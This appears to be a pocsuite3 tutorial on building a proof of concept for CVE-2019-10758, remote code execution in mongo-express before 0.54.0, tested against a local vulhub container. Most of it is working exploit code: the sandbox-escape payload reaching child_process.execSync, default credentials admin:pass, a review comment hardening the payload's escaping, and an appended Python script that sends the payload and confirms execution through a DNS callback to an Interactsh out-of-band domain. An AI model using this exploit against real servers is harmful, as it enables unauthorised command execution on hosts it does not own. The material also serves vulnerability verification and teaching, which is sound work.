
Mongo-express Authenticated Remote Code Execution Vulnerability (CVE-2019-10758)

Vulnerability details: mongo-express Remote Code Execution Vulnerability (CVE-2019-10758)

Mongo-express is a web-based MongoDB admin interface written in Node.js, Express.js, and Bootstrap3.

Mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that use the toBSON method: user-supplied input is evaluated with Node's vm module, which is not a security sandbox, so the submitted JavaScript can escape the context and reach the host process. If the attacker can log in, or the target still uses the default credentials (admin:pass), arbitrary Node.js code can be executed on the server.

PoC development

Use pocsuite --new to generate the template. The command output is not returned in the HTTP response, so this is verified out-of-band (OOB), with an interaction service such as CEye or Interactsh recording a callback from the target.

TIP

Out-of-band (OOB) vulnerabilities are those whose exploitation cannot be observed in the ordinary HTTP request/response; the attacker confirms it through an alternative channel, typically a DNS or HTTP request that the target makes to a server the attacker controls.

Interactsh is an open-source tool for detecting out-of-band interactions, developed by projectdiscovery, a well-known open-source organization. If you own a domain, you can quickly set up your own OOB service. Public instances are also available, such as interact.sh, oast.pro, oast.live, oast.site, oast.online, oast.fun and oast.me.

Generate template.

➜ pocsuite --new
...
-----
Seebug ssvid (eg, 99335) [0]: 98116
PoC author (eg, Seebug) []: Seebug
Vulnerability disclosure date (eg, 2021-8-18) [2022-7-11]: 2020-01-03
Advisory URL (eg, https://www.seebug.org/vuldb/ssvid-99335) [https://www.seebug.org/vuldb/ssvid-98116]:
Vulnerability CVE number (eg, CVE-2021-22123) []: CVE-2019-10758
Vendor name (eg, Fortinet) []:
Product or component name (eg, FortiWeb) []: mongo-express
Affected version (eg, <=6.4.0) []: <=0.53.0
Vendor homepage (eg, https://www.fortinet.com) []: https://github.com/mongo-express/mongo-express

0    Arbitrary File Read
1    Code Execution
2    Command Execution
3    Denial Of service
4    Information Disclosure
5    Login Bypass
6    Path Traversal
7    SQL Injection
8    SSRF
9    XSS

Vulnerability type, choose from above or provide (eg, 3) []: 1
Authentication Required (eg, yes) [no]: yes  # Auth required
Can we get result of command (eg, yes) [no]: no  # Out-of-Band vulnerabilities
Out-of-band server to use (eg, interactsh) [ceye]: interactsh
...

Simply modify the template according to the details of the vulnerability.

     def _options(self):
         o = OrderedDict()
-        o['user'] = OptString('', description='The username to authenticate as', require=True)
-        o['pwd'] = OptString('', description='The password for the username', require=True)
+        o['user'] = OptString('admin', description='The username to authenticate as', require=True)
+        o['pwd'] = OptString('pass', description='The password for the username', require=True)
         o['cmd'] = OptString('uname -a', description='The command to execute')
         return o

     def _exploit(self, param=''):
-        if not self._check(dork=''):
+        if not self._check(dork='mongo-express='):
             return False

         user = self.get_option('user')
         pwd = self.get_option('pwd')
         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
-        payload = 'a=b'
-        res = requests.post(self.url, headers=headers, data=payload)
+        payload = (
+            'document=this.constructor.constructor("return process")().'
+            f'mainModule.require("child_process").execSync("{param}")'
+        )
+        res = requests.post(f'{self.url}/checkValid', headers=headers, data=payload, auth=(user, pwd))
         logger.debug(res.text)
         return res.text
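Review bot: in the `_exploit` hunk, `{param}` is interpolated unescaped into a double-quoted JS string inside `execSync("...")`, and the whole body is then sent as a raw string instead of being form-encoded, so a command containing `"`, `\`, `&`, `+` or `%` either breaks out of the string literal or is mangled by the server's urlencoded body parser. Build the literal with `json.dumps(param)` and let requests encode the form, e.g. `payload = 'this.constructor.constructor("return process")().mainModule.require("child_process").execSync(' + json.dumps(param) + ')'` followed by `requests.post(f'{self.url}/checkValid', data={'document': payload}, auth=(user, pwd))`. Note also that returning `res.text` says nothing about whether the command ran on this blind endpoint; the caller has to confirm success through the OOB callback.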

Preparing the vulnerable environment

Create the vulnerable environment using vulhub.

┌──(kali㉿kali)-[/tmp]
└─$ git clone https://github.com/vulhub/vulhub.git && cd vulhub/mongo-express/CVE-2019-10758 && docker-compose up -d
Cloning into 'vulhub'...
remote: Enumerating objects: 12574, done.
remote: Total 12574 (delta 0), reused 0 (delta 0), pack-reused 12574
Receiving objects: 100% (12574/12574), 139.45 MiB | 1015.00 KiB/s, done.
Resolving deltas: 100% (5003/5003), done.
Creating network "cve-2019-10758_default" with the default driver
Creating cve-2019-10758_mongo_1 ... done
Creating cve-2019-10758_web_1   ... done
┌──(kali㉿kali)-[/tmp/vulhub/mongo-express/CVE-2019-10758]
└─$ curl -I localhost:8081
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 8199
ETag: W/"2007-KWtm8qZk7ZuiLlUF3uCj0lng5+Q"
Set-Cookie: mongo-express=s%3AaKAompVZQO7rTWLcDL0RqFa1FMt-ufPd.PTqXL2A%2BZm8I6o%2BT6Jz1xNLDTbbsJi1IS%2BmouRgrJns; Path=/; HttpOnly
Date: Thu, 14 Jul 2022 23:01:01 GMT
Connection: keep-alive

Vulnerability verification

The command-line options --user admin --pwd pass --oob-server interact.sh set the username, password and OOB service to use; any option not given falls back to the default value defined in the PoC.
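The OOB verification flow from the tip above (a unique token carried in a DNS callback, then a check of the records the OOB server reports) together with the payload construction from the template, as an added, self-contained example. This is not code from the original page, pocsuite3 or mongo-express; the function names, the record format (modelled on the JSON that interactsh-client prints) and the sample interactions are assumptions made for illustration, and send_payload is the only part that touches the network.

```python
"""Payload construction and out-of-band verification for CVE-2019-10758.

Added example for this page; it is not code from pocsuite3, mongo-express or
the original article. The function names (build_payload, form_body, oob_probe,
verify_oob, send_payload) and the sample interaction records are assumptions
made for illustration.
"""
import base64
import json
import secrets
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# Sandbox escape used on the page: the vm context's `this` has a constructor
# chain leading back to Function, from which the host `process` is reachable.
SANDBOX_ESCAPE = (
    'this.constructor.constructor("return process")()'
    '.mainModule.require("child_process")'
)


def build_payload(cmd: str) -> str:
    """JS expression for the `document` field of POST /checkValid.

    json.dumps() yields a valid JS string literal, so quotes or backslashes
    in cmd cannot break out of the execSync() argument.
    """
    return f'{SANDBOX_ESCAPE}.execSync({json.dumps(cmd)})'


def form_body(cmd: str) -> str:
    """application/x-www-form-urlencoded body.

    urlencode() percent-encodes '&', '+', '=', '%' and similar, which a raw
    'document=...' string would leave for the server's body parser to mangle.
    """
    return urlencode({"document": build_payload(cmd)})


def oob_probe(oob_domain: str, token: str = "") -> tuple:
    """Command for blind verification: its only observable effect is a DNS
    lookup of <token>.<oob_domain>, which the OOB server records.

    A fresh random token ties the callback to this exact request, so a lookup
    caused by a scanner or a stale resolver cannot be mistaken for it.
    """
    token = token or secrets.token_hex(8)
    return token, f"nslookup {token}.{oob_domain}"


def verify_oob(interactions, token: str) -> bool:
    """True if any interaction record carries the token.

    Records are dicts in the shape printed by interactsh-client -json
    (full-id, raw-request, ...). DNS names are case-insensitive and some
    resolvers randomise case, so the comparison is lowercased.
    """
    needle = token.lower()
    for rec in interactions:
        seen = " ".join(str(rec.get(k, "")) for k in ("full-id", "raw-request"))
        if needle in seen.lower():
            return True
    return False


def send_payload(base_url: str, user: str, pwd: str, cmd: str, timeout: float = 10) -> int:
    """POST the payload to /checkValid with HTTP Basic auth (mongo-express's
    default login scheme) and return the HTTP status. Network call; the
    offline checks below never invoke it.
    """
    req = Request(base_url.rstrip("/") + "/checkValid",
                  data=form_body(cmd).encode(), method="POST")
    cred = base64.b64encode(f"{user}:{pwd}".encode()).decode()
    req.add_header("Authorization", f"Basic {cred}")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    with urlopen(req, timeout=timeout) as resp:
        return resp.status


# Constructed sample: two records as an OOB server might report them after the
# probe command ran on the target. Addresses are from documentation ranges.
SAMPLE_INTERACTIONS = [
    {"protocol": "dns", "q-type": "A", "remote-address": "203.0.113.7",
     "full-id": "deadbeefcafef00d.c7x1abc2.oast.fun"},
    {"protocol": "http", "remote-address": "198.51.100.23",
     "full-id": "c7x1abc2.oast.fun", "raw-request": "GET /robots.txt HTTP/1.1"},
]


if __name__ == "__main__":
    token, probe = oob_probe("c7x1abc2.oast.fun", "deadbeefcafef00d")
    print(form_body(probe))
    print("callback seen:", verify_oob(SAMPLE_INTERACTIONS, token))
```

Against the vulhub container, generate a probe with a real Interactsh subdomain, call send_payload('http://localhost:8081', 'admin', 'pass', probe), then pass the interactions your OOB client reports to verify_oob; a match on the token, not the HTTP status of /checkValid, is what proves execution.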

Released under the GPLv2 License.